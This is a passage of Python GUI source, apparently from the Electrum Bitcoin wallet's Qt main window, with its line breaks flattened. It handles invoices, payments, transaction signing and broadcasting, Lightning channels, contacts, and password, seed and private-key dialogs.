asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) return fut.result() self.wallet.thread.add(task) def on_request_status(self, wallet, key, status): if wallet != self.wallet: return req = self.wallet.receive_requests.get(key) if req is None: return if status == PR_PAID: self.notify(_('Payment received') + '\n' + key) self.need_update.set() else: self.request_list.update_item(key, req) def on_invoice_status(self, wallet, key): if wallet != self.wallet: return invoice = self.wallet.get_invoice(key) if invoice is None: return status = self.wallet.get_invoice_status(invoice) if status == PR_PAID: self.invoice_list.update() else: self.invoice_list.update_item(key, invoice) def on_payment_succeeded(self, wallet, key): description = self.wallet.get_label(key) self.notify(_('Payment succeeded') + '\n\n' + description) self.need_update.set() def on_payment_failed(self, wallet, key, reason): self.show_error(_('Payment failed') + '\n\n' + reason) def read_invoice(self): if self.check_send_tab_payto_line_and_show_errors(): return if not self._is_onchain: invoice_str = self.payto_e.lightning_invoice if not invoice_str: return if not self.wallet.has_lightning(): self.show_error(_('Lightning is disabled')) return invoice = LNInvoice.from_bech32(invoice_str) if invoice.get_amount_msat() is None: amount_sat = self.amount_e.get_amount() if amount_sat: invoice.amount_msat = int(amount_sat * 1000) else: self.show_error(_('No amount')) return return invoice else: outputs = self.read_outputs() if self.check_send_tab_onchain_outputs_and_show_errors(outputs): return message = self.message_e.text() return self.wallet.create_invoice( outputs=outputs, message=message, pr=self.payment_request, URI=self.payto_URI) def do_save_invoice(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.save_pending_invoice() def save_pending_invoice(self): if not self.pending_invoice: return self.do_clear() self.wallet.save_invoice(self.pending_invoice) self.invoice_list.update() self.pending_invoice = None def do_pay(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.do_pay_invoice(self.pending_invoice) def pay_multiple_invoices(self, invoices): outputs = [] for invoice in invoices: outputs += invoice.outputs self.pay_onchain_dialog(self.get_coins(), outputs) def do_pay_invoice(self, invoice: 'Invoice'): if invoice.type == PR_TYPE_LN: assert isinstance(invoice, LNInvoice) self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat()) elif invoice.type == PR_TYPE_ONCHAIN: assert isinstance(invoice, OnchainInvoice) self.pay_onchain_dialog(self.get_coins(), invoice.outputs) else: raise Exception('unknown invoice type') def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]: coins = self.get_manually_selected_coins() if coins is not None: return coins else: return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only) def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]: """Return a list of selected coins or None. Note: None means selection is not being used, while an empty sequence means the user specifically selected that. """ return self.utxo_list.get_spend_list() def get_text_not_enough_funds_mentioning_frozen(self) -> str: text = _("Not enough funds") frozen_bal = sum(self.wallet.get_frozen_balance()) if frozen_bal: text += " ({} {} {})".format( self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen") ) return text def pay_onchain_dialog( self, inputs: Sequence[PartialTxInput], outputs: List[PartialTxOutput], *, external_keypairs=None) -> None: # trustedcoin requires this if run_hook('abort_send', self): return is_sweep = bool(external_keypairs) make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=inputs, outputs=outputs, fee=fee_est, is_sweep=is_sweep) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep) if conf_dlg.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not conf_dlg.have_enough_funds_assuming_zero_fees(): text = self.get_text_not_enough_funds_mentioning_frozen() self.show_message(text) return # shortcut to advanced preview (after "enough funds" check!) if self.config.get('advanced_preview'): preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() return cancelled, is_send, password, tx = conf_dlg.run() if cancelled: return if is_send: self.save_pending_invoice() def sign_done(success): if success: self.broadcast_or_show(tx) self.sign_tx_with_password(tx, callback=sign_done, password=password, external_keypairs=external_keypairs) else: preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() def broadcast_or_show(self, tx: Transaction): if not tx.is_complete(): self.show_transaction(tx) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) self.show_transaction(tx) return self.broadcast_transaction(tx) @protected def sign_tx(self, tx, *, callback, external_keypairs, password): self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs) def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if external_keypairs: # can sign directly task = partial(tx.sign, external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx: Transaction): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Invoice has expired") try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: return False, e.get_message_for_gui() except BestEffortRequestFailed as e: return False, repr(e) # success txid = tx.txid() if pr: self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return True, txid # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: success, msg = result if success: parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def mktx_for_open_channel(self, funding_sat): coins = self.get_coins(nonlocal_only=True) make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins, funding_sat=funding_sat, fee_est=fee_est) return make_tx def open_channel(self, connect_str, funding_sat, push_amt): try: extract_nodeid(connect_str) except ConnStringFormatError as e: self.show_error(str(e)) return # use ConfirmTxDialog # we need to know the fee before we broadcast, because the txid is required make_tx = self.mktx_for_open_channel(funding_sat) d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False) # disable preview button because the user must not broadcast tx before establishment_flow d.preview_button.setEnabled(False) cancelled, is_send, password, funding_tx = d.run() if not is_send: return if cancelled: return # read funding_sat from tx; converts '!' to int value funding_sat = funding_tx.output_value_for_address(ln_dummy_address()) def task(): return self.wallet.lnworker.open_channel(connect_str=connect_str, funding_tx=funding_tx, funding_sat=funding_sat, push_amt_sat=push_amt, password=password) def on_success(args): chan, funding_tx = args n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) if not funding_tx.is_complete(): message += '\n\n' + _('Please sign and broadcast the funding transaction') self.show_message(message) if not funding_tx.is_complete(): self.show_transaction(funding_tx) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(repr(e))) WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b: bool) -> None: self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoices(self, keys): for key in keys: self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setAmount(pr.get_amount()) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request: 'paymentrequest.PaymentRequest'): self.set_onchain(True) self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): """Parse ln invoice, and prepare the send tab for it.""" try: lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) except Exception as e: raise LnDecodeException(e) from e pubkey = bh2u(lnaddr.pubkey.serialize()) for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.get_amount_sat() is not None: self.amount_e.setAmount(lnaddr.get_amount_sat()) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self._is_onchain = b self.max_button.setEnabled(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e]: e.setText('') e.setFrozen(False) self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool): utxos_str = {utxo.prevout.to_str() for utxo in utxos} self.wallet.set_frozen_state_of_coins(utxos_str, freeze) self.utxo_list.update() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = UTXOList(self) return self.create_list_tab(self.utxo_list) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if not self.question(_("Do you want to remove {} from your wallet?").format(addr)): return try: self.wallet.delete_address(addr) except UserFacingException as e: self.show_error(str(e)) else: self.need_update.set() # history, addresses, coins self.clear_receive_tab() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_onchain_invoice(self, invoice: OnchainInvoice): amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit() d = WindowModalDialog(self, _("Onchain Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) grid.addWidget(QLabel(amount_str), 1, 1) if len(invoice.outputs) == 1: grid.addWidget(QLabel(_("Address") + ':'), 2, 0) grid.addWidget(QLabel(invoice.get_address()), 2, 1) else: outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs)) grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0) grid.addWidget(QLabel(outputs_str), 2, 1) grid.addWidget(QLabel(_("Description") + ':'), 3, 0) grid.addWidget(QLabel(invoice.message), 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1) if invoice.bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70)) pr.verify(self.contacts) grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0) grid.addWidget(QLabel(pr.get_requestor()), 5, 1) grid.addWidget(QLabel(_("Signature") + ':'), 6, 0) grid.addWidget(QLabel(pr.get_verify_status()), 6, 1) def do_export(): key = pr.get_id() name = str(key) + '.bip70' fn = getSaveFileName( parent=self, title=_("Save invoice to file"), filename=name, filter="*.bip70", config=self.config, ) if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('BIP70 invoice saved as {}').format(fn)) exportButton = EnterButton(_('Export'), do_export) buttons = Buttons(exportButton, CloseButton(d)) else: buttons = Buttons(CloseButton(d)) vbox.addLayout(grid) vbox.addLayout(buttons) d.exec_() def show_lightning_invoice(self, invoice: LNInvoice): lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP) d = WindowModalDialog(self, _("Lightning Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0) grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit() grid.addWidget(QLabel(amount_str), 1, 1) grid.addWidget(QLabel(_("Description") + ':'), 2, 0) grid.addWidget(QLabel(invoice.message), 2, 1) grid.addWidget(QLabel(_("Hash") + ':'), 3, 0) payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex()) payhash_e.addCopyButton(self.app) payhash_e.setReadOnly(True) vbox.addWidget(payhash_e) grid.addWidget(payhash_e, 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1) vbox.addLayout(grid) invoice_e = ShowQRTextEdit(config=self.config) invoice_e.addCopyButton(self.app) invoice_e.setText(invoice.invoice) vbox.addWidget(invoice_e) vbox.addLayout(Buttons(CloseButton(d),)) d.exec_() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.db.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, 'lnutil': lnutil, }) c = commands.Commands( config=self.config, daemon=self.gui_object.daemon, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, **kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config','daemon']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.lightning_button = None if self.wallet.has_lightning(): self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog) self.update_lightning_icon() sb.addPermanentWidget(self.lightning_button) self.status_button = None if self.network: self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def create_coincontrol_statusbar(self): self.coincontrol_sb = sb = QStatusBar() sb.setSizeGripEnabled(False) #sb.setFixedHeight(3 * char_width_in_lineedit()) sb.setStyleSheet('QStatusBar::item {border: None;} ' + ColorScheme.GREEN.as_stylesheet(True)) self.coincontrol_label = QLabel() self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred) self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse) sb.addWidget(self.coincontrol_label) clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None)) clear_cc_button.setStyleSheet("margin-right: 5px;") sb.addPermanentWidget(clear_cc_button) sb.setVisible(False) return sb def set_coincontrol_msg(self, msg: Optional[str]) -> None: if not msg: self.coincontrol_label.setText("") self.coincontrol_sb.setVisible(False) return self.coincontrol_label.setText(msg) self.coincontrol_sb.setVisible(True) def update_lightning_icon(self): if self.lightning_button is None: return if self.network is None or self.network.channel_db is None: self.lightning_button.setVisible(False) return self.lightning_button.setVisible(True) cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate() # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}") progress_str = "??%" if progress_percent is not None: progress_str = f"{progress_percent}%" if progress_percent and progress_percent >= 100: self.lightning_button.setMaximumWidth(25) self.lightning_button.setText('') self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced.")) else: self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit()) self.lightning_button.setText(progress_str) self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n" "Payments are more likely to succeed with a more complete graph.")) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) def change_password_dialog(self): from electrum.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_wallet_info(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) vbox = QVBoxLayout() wallet_type = self.wallet.db.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) # lightning grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0) if self.wallet.can_have_lightning(): grid.addWidget(QLabel(_('Enabled')), 5, 1) local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey)) local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse) grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0) grid.addWidget(local_nodeid, 6, 1, 1, 3) else: grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1) grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2) vbox.addLayout(grid) labels_clayout = None if self.wallet.is_deterministic(): keystores = self.wallet.get_keystores() ks_stack = QStackedWidget() def select_ks(index): ks_stack.setCurrentIndex(index) # only show the combobox in case multiple accounts are available if len(keystores) > 1: def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: select_ks(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click) vbox.addLayout(labels_clayout.layout()) for ks in keystores: ks_w = QWidget() ks_vbox = QVBoxLayout() ks_vbox.setContentsMargins(0, 0, 0, 0) ks_w.setLayout(ks_vbox) mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config) mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) run_hook('show_xpub_button', mpk_text, ks) der_path_hbox = QHBoxLayout() der_path_hbox.setContentsMargins(0, 0, 0, 0) der_path_hbox.addWidget(QLabel(_("Derivation path") + ':')) der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown")) der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse) der_path_hbox.addWidget(der_path_text) der_path_hbox.addStretch() ks_vbox.addWidget(QLabel(_("Master Public Key"))) ks_vbox.addWidget(mpk_text) ks_vbox.addLayout(der_path_hbox) ks_stack.addWidget(ks_w) select_ks(0) vbox.addWidget(ks_stack) vbox.addStretch(1) btn_export_info = run_hook('wallet_info_buttons', self, dialog) btn_close = CloseButton(dialog) btns = Buttons(btn_export_info, btn_close) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase, config=self.config) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None, *, help_text=None, show_copy_text_btn=False): if not data: return d = QRDialog( data=data, parent=parent or self, title=title, help_text=help_text, show_copy_text_btn=show_copy_text_btn, config=self.config, ) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk, config=self.config) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e 